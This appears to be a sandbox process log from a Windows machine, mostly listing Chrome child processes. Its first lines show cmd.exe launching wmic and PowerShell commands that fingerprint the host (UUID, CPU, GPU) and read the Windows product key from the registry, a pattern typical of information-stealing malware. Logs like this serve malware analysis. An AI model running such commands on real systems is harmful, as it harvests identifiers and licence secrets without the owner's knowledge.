C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffdcf30cc40,0x7ffdcf30cc4c,0x7ffdcf30cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1728,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1760 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2016,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2040 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1956 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3264,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3428 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3724,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4580 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4720,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4700 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3708,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4896,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4940,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4976 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5304,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5312 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5076,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5272 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4988,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5188 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5644,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5624 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5188,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5092 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4532,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5388 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5176,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3508 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=3552,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5052 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=4540,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3428 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3332,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3388 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3376,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3368 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=4048,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4032 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=3408,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3360 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=4616,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3516 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=5052,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5784 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=5748,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4680 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=4564,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5580 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=4996,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5732 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=5936,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5948 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=5956,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5992 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=5976,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6228 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6444,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6416 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=6736,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6988 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=6096,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5980 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=6604,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6004 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=6624,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5960 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=6632,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5948 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=6636,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4636 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=6620,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7672 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=7100,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7772 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=6608,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7896 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=6904,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6700 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=5308,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8256 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=7284,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8284 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=7188,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6848 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=7172,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8424 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=6804,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8736 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=6788,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7600 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=7408,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8900 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=6748,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9020 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=7240,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9140 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=9396,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9388 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=7244,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9436 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --field-trial-handle=6760,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9552 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=6800,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9668 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --field-trial-handle=6916,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9808 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=6820,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6776 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=6836,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10104 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=7252,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10208 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --field-trial-handle=6724,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10340 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --field-trial-handle=7364,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7468 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --field-trial-handle=7352,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10568 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --field-trial-handle=7344,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10676 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --field-trial-handle=7560,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7540 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --field-trial-handle=7572,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10896 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --field-trial-handle=6764,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7588 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --field-trial-handle=7596,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=11048 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --field-trial-handle=7604,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=11180 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
